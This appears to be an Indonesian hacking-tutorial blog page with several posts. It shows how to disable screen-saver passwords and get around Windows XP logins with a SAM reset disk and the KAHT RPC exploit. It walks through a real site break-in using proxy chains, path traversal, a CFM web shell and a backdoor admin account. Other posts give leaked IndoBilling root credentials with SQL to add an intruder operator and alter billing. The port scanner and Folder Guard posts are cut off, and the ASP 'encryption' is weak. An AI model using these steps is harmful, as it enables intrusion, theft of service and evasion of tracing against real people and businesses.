Search This Blog

Loading...

April 15, 2008

Siingkiirkan Password Screen Saver

Menggunakan screen saver merupakan salah satu cara dalam menjaga privacy seorang
pengguna serta menghemat energi. Terutama bagi mereka yang bekerja di suatu perusahaan
pastilah screen saver sangat berguna dalam menjaga privacy para karyawan ketika mereka
meninggalkan komputer dalam keadaan menyala. Selain dilengkapi dengan password screen
saver juga dilengkapi dengan tampilan yang menarik dan atraktif sehingga tidak membosankan
para peniliknya.
Adakalanya si pengguna lupa akan password tersebut sehingga terpaksa mau tidak mau mereka
tidak dapat masuk ke lingkungan kerjanya kembali. Sebenarnya Windows sudah memberikan
option (pilihan) yang terletak di Display Properties pada tab Screen Saver (khususnya bagi
pemakai Windows 98) dimana para pengguna dapat menghilangkan password dari screen saver
dengan cara menghilangkan tanda centang di pilihan Password.
Namun sungguh sangat disayangkan jika jendela tersebut tidak dapat diakses oleh para
pengguna karena diproteksi oleh Administrator, sehingga para pengguna tidak dapat merubah
ataupun menghilangkan password dari screen saver yang telah mereka buat. Pada dasarnya ada
satu cara praktis nan hemat memori yaitu dengan menggunakan bantuan JavaScript sehingga
password yang memproteksi screen saver dapat dihilangkan tanpa perlu membuka jendela
Display Properties. Penasaran ingin mencobanya? Silahkan ikuti petunjuk-petunjuk berikut ini.
Trik yang satu ini pernah dimuat di Tabloid PCplus pada edisi 282 (1-14 Mei 2007) melalui
rubrik trik.

Trik Siingkiirkan Password Screen Saver
Untuk lebih jelasnya, Salinlah kode-kode program berikut ini melalui Notepad lalu simpanlah
dengan nama dispass.js dan janganlah lupa untuk mengubah Save as type yang tadinya bertipe
Text Documents (*.txt) menjadi All Files. Nonaktifkan pula Word Wrap yang ada di Notepad
pada saat pengetikan script program.

function kata(pesan)
{
nt.popup(pesan,0,"Modifikasi Password Screen Saver");
}
function catat(harga)
{
nt.RegWrite ("HKCU\\Control Panel\\Desktop"+
"\\ScreenSaverIsSecure",harga,"REG_SZ");
nt.RegWrite ("HKCU\\Control Panel\\Desktop"+
"\\ScreenSaveUsePassword",harga,"REG_DWORD");
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, nt;
nt = WScript.CreateObject("WScript.Shell");
pesan = "Silahkan Klik:\n\n"+
"[Yes] untuk Nonaktifkan Password Screen Saver.\n"+
"[No] untuk Aktifkan Password Screen Saver.\n"+
"[Cancel] untuk Keluar dari menu.\n\n"+
"[*] mailto:prasdikatamajr@yahoo.com [*]\n\n"+
"NonAktifkan Password Screen Saver sekarang?";
tanya = nt.popup(pesan,0,"Modifikasi Password Screen Saver",vbYesNoCancel);
if (tanya == vbYes)
{
harga=0;
pesan="Password Screen Saver DiNonAktifkan!";
catat(harga);
kata(pesan);
}
else if (tanya == vbNo)
{
harga=1;
pesan="Password Screen Saver DiAktifkan!";
catat(harga);
kata(pesan);
}
else
{
pesan="PCplus OK!";
kata(pesan);
}
Setelah menyalin script program diatas cobalah buka Windows Explorer, lalu cari file yang
bernama dispass.js. Klik dua kali pada ikon file tersebut untuk mengeksekusinya. Setelah
jendela dispass.js muncul lalu klik tombol Yes untuk menonaktifkan password screen saver.
Tunggulah beberapa menit hingga screen saver muncul kemudian lihatlah hasilnya. Password
telah hilang dan sungguh menyenangkan bukan? Program diatas telah di uji coba di salah satu
platform sistem operasi keluaran Microsoft yaitu Windows 98. It’s worked! ☺





Password Default untuk windows XP

Hoii ... ;-) ...
Jaman sekarang di Indonesia hampir semua pake Windows XP Bajakan. Huehuehueh ...
Tapi kali ini /me nggak akan ngebahas masalah begituan, tapi lebih ke arah teknisnya. Mungkin udah banyak yang tau kalo, untuk setiap komputer baru yang sudah bawaannya terinstall Windows XP, masih ada kerentanan yang masih kita ekploitasi. yaitu ; Password Default. Ayo kita buktikan ...
Ketika windows XP dinyalakan dan kita dihadapkan oleh pilihan login [ welcome screen ]. Jangan dulu pilih salah satu, yang harus dilakukan sebelumnya adalah, menekan ctrl+alt+del sekali saja, tunggu sebentar kemudian tekan ctrl+alt+del sekali lagi. Jreng jreng jreng, kita di hadapkan dengan 2 textbox, yaitu username dan password, usernamenya diisi dengan Administrator sedangkan passwordnya dibiarkan kosong saja. Kemudian tekan enter....
Jreng jreng jreng ... kita sudah login dengan account Administrator. Ya, untuk mengatasi kerentenan ini silahkan ganti passwordnya. start | run | nusrmgr.cpl

Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...
Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....
Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...
Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...

-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------
Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.
Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...
C:\Documents and Settings\Al-k>net user
User accounts for \\NOMATTER
-------------------------------------------------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.
// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada
D:\Data+ku_>
Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.
D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
________________________________________________
[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User.

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.


Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/
, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (


Studi Kasus kelemahan Server Situs www.rasasayang.com.my

Situs http://www.rasasayang.com.my/ secara sekilas terlihat tidak memiliki bug yang cukup berarti untuk dieksploitasi oleh hacker. Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini.

1. Persiapan hacking
2. Pemeriksaan bug
3. Mendownload source code dan file konfigurasi
4. Mengupload file explorer dan windows shell command interface
5. Mengambil-alih server

Saya akan menjelaskan langkah-langkah di atas satu per satu.

1. Persiapan hacking
Sebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh "Pengejar Hacker" maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China.

Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5:

bouncer --bind 192.168.0.5 --port 8881 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8882 --tunnel 192.168.0.5:8881 --destination 200.0.0.1:3128

Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my

Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.


2. Pemeriksaan bug
Pemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL:
http://www.rasasayang.com.my/index.cfm??dir=download&menu=home&task=dl_comm&cfile=

Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya.

http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\download\dl_comm.cfm

Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut.





Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.


3. Mendownload source code dan file konfigurasi

Kita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya:

http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\application.cfm
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\index.cfm

Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini.

Selanjutnya kita download file konfigurasi web servernya dengan cara berikut:

File konfigurasi IIS:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\WINDOWS\system32\inetsrv\MetaBase.xml

File konfigurasi CFM:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\CFusionMX7\lib\neo-query.xml

File History Internet Explorer untuk Administrator
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat

Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.
- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:\webuser\web\powerofpaytv.com
- www.jedrealty.com yang terletak di E:\webuser\web\jedrealty.com
- www.rasasayang.com.my yang terletak di E:\webuser\web\rasasayang.com.my

Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/

Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb yang dapat kita download melalui:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=E:\&CFILE=..\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb

Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.


4. Mengupload file explorer dan windows shell command interface
Dari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file.

Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut:










#Replace(Replace(Replace('#cmdResult#', '<', '<', 'all'), '>', '>', 'all'), Chr(10), '
', 'all')#



5. Mengambil-alih server
Kita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface.

NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YES
NET LOCALGROUP Administrators mbahjambon /ADD

Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut:

bouncer --bind 192.168.0.5 --port 8883 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8884 --tunnel 192.168.0.5:8883 --destination 202.157.176.17:3389

sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884

Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.


Security Vulnerability Pada IndoBilling

Ngerti bahasne po ora dab ???? pokok e kaya gt lah ...
[x] Trus permasalahanya apa ???
sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.
[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???
ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya ... d0s4 !! kan rejekinya udh ada
sendiri-sendiri)
[x] Emang caranya gmn c ???
manfaatin aj SQL Manager. eg. SQLyog.
[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.
[x] IP nya tau dr mn ??
ya liat aja pake netstat.
[x] Oww ... gt ya ... menarik jg nih. Jelasin dong !!!

kay .... pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.

caranya ::
buat file "netstat.bat" yang isinya berikut ini

============== NETSTAT.BAT ============= [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]

fungsi dari perintah ini adalah mencetak hasil dari "netstat" ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.

contoh ::

========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================

keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.

Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini Download SQLyog.

/*mlm ni masih lumayan ad temennya, nge-blog bareng 'eross fyuuhhh ... tetep ngantuk jg.
(cukup ....kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !!! )*/

kemaren udh sampe di bahasan "mengetahui IP Billing Server", sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah "password & username" nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================

[x]nah lo ... tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???
yaahh... sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya ...

hmmm.... udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja.
kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table "warnet".
misalnya kita pengen nambahin operator di billing server dengan username "cracker" dan password "cracker" yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :

============================================= [don't copy paste this line]
insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,'cracker',password('cracker'),'intruder','true','true','true','true','true','true','true','Y','Y','Y','Y','Y','Y','Y')
============================================= [don't copy paste this line]

nahhh .... gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = 'yyyy-mm-dd hh:mm:ss'
-> format st_name = 'nama username'
-> st_id = 'nomor KBU'
yang perlu diinget adalah nilai "st_start" harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don't copy paste this line]
update station set st_start='2007-07-01 20:30:30',st_name='invisible_theater', st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]

dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),' ',curtime()),st_name='invisible_theater', st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]

kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.

[x]hmmm.... boleh-boleh .......... trus kq bisa ya ??? ada apa c sebenernya??
yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?

kira-kira gitu deh ... silakan di uprek sendiri dengan kreatifitas sendiri ya ...

cacian dan makian serta cercaan diterima di sini nih :
YahooMessenger : invisible_theater
e-mail : invisible.theater@gmail.com


tested on IndoBilling ver. 5.92
source refferer : http://r0mantic.blogs.friendster.com/my_blog/
greetz ::
cHay0s
erossXunder
buLLoVa
anticode t34m
indolini t34m
all jasakom geeks and members

Penjebolan Server Melalui FTP

Pada article ini akan memberikan sedikit trik bagaimana melakukan penjebolan server melalui FTP. Untuk lebih jelasnya akan kita ikuti langkah-demi langkah code di bawah ini. Pertama yang perlu disiapkan adalah scanner, saya menyertakannya sourcenya dalam C.


Mari kita lihat contoh coding nya di bawah ini :

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define DEF_STR_PORT 1
#define DEF_STP_PORT 1024
#define OXO 1

struct sockaddr_in addr;
struct hostent *rh;
struct servent *rp;

int sock,i;
int str_ptr, stp_ptr;
int Usage(char *ARG);
int CONNECTION(int port);

int main(int argc, char *argv[])
{

if (argc != 4)
Usage(argv[0]);

str_ptr = atoi(argv[2]);
stp_ptr = atoi(argv[3]);
if (strcmp(argv[2],"-")==0 && strcmp(argv[3],"-")==0){
str_ptr = DEF_STR_PORT;
stp_ptr = DEF_STP_PORT;
}

if ( str_ptr > stp_ptr){
fprintf(stderr,"DetecT ErroR !!! On PortS, Can't Be Greater
Than .-\n");
Usage(argv[0]);
exit(OXO);
}

if ((rh=gethostbyname(argv[1])) == NULL){
fprintf(stderr,"Can't Resolve Host %s .-\n",argv[1]);
Usage(argv[0]);
exit(OXO);
}

printf("ScanninG Host %s From %d TcP Port To %d .-\n",argv[1],str_ptr,stp_ptr);
for (i=str_ptr; i <= stp_ptr; i++)
{
if (CONNECTION(i)==0)
{
rp=getservbyport(htons(i),"tcp");
printf("Port %d Is Open !!!


Pemrograman ASP untuk Mengenkripsi Password

Seringkali dalam situs ada fitur login username dan password atau login khusus administrator, untuk dapat mengakses dan menggunakan berbagai fitur yang disimpan dalam database(umumnya SQL atau Access)



Namun, bagaimana jika seorang attacker mendapatkan table user dan semua password user? Ini malapetaka. Tentunya anda ingin menyembunyikan atau mengenkripsi password dalam tabel user. Berikut ini saya berikan VBscript yang dikombinasikan dengan script ASP.


untuk mengenkripsi password user. Terlebih dahulu kita membuat sebuah fungsi yang kita perintahkan untuk mengenkripsi password ke dalam karakter ASCII. Fungsi ini kita namakan fungsi enkripsi. Berikut ini adalah VBscript yang akan kita gunakan.







Function enkripsi(x1, x2)

   s = ""

   t = 0

   For i = 1 to len(x1)

       t = t + asc(mid(x1,i,1))

   Next

   For i = 1 to len(x2)

       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255

       s = s & chr(y)

   Next

   For i = (len(x2) + 1) to 10

       If t>598.8 Then t = 598.8

       y = t^3*i mod 255

       s = s & chr(y)

   Next

   enkripsi = s

End Function



VBscript ini akan kita gunakan dalam file bernama enkripsi.asp. Lihat contohnya dibawah ini:






//

//

 Enkripsi <br /> <br /> <br /> <br /> <br />//<body> <br /> <br /> <br /> <br />Username: <br /> <br /> <br />Password: <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br />CATATAN: <br /> <br /> <br /> <br />Anda dapat mengubah kode berikut sesuai dengan konfigurasi situs anda <br /> <br /> <br /> <br />misalnya menjadi seperti ini: <br /> <br /> <br /> <br /> <br /> <br /> <br />Fungsi ini tidak dapat dibalik, maksudnya jika user lupa password, maka harus diberikan password baru. Tapi kita tidak membahas masalah fitur ini. Disini saya hanya menerangkan metode enkripsi password melalui pemrograman ASP. <br /> <br /> <br /> <br />Meskipun script ini bukan enkripsi tingkat tinggi, tapi cukup efektif dalam mengelabui hacker-hacker kelas teri (sorry kagak bermaksud menghina, tapi iya khan? hehe). Untuk yang hacker kelas berat, kita memerlukan area secure yang terenkripsi, seperti https:// <br /> <br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/pemrograman-asp-untuk-mengenkripsi.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/pemrograman-asp-untuk-mengenkripsi.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-15T12:29:00+07:00'>12:29 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=9011303176707113372' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=9011303176707113372' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=9011303176707113372&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://bens-qiu.blogspot.com/search/label/Tutorial%20ASP' rel='tag'>Tutorial ASP</a>, <a href='http://bens-qiu.blogspot.com/search/label/Tutorial%20Hacking' rel='tag'>Tutorial Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='193687692134022521' itemprop='postId'/> <a name='193687692134022521'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/menjebol-password-folder-guard-pro-52.html'>Menjebol Password FOLDER GUARD Pro 5.2</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-193687692134022521' itemprop='description articleBody'> Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.<br /><br />Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net. <br /><br />Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2. <br /><br />Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save. <br /><br />Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi. <br /><br />Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama 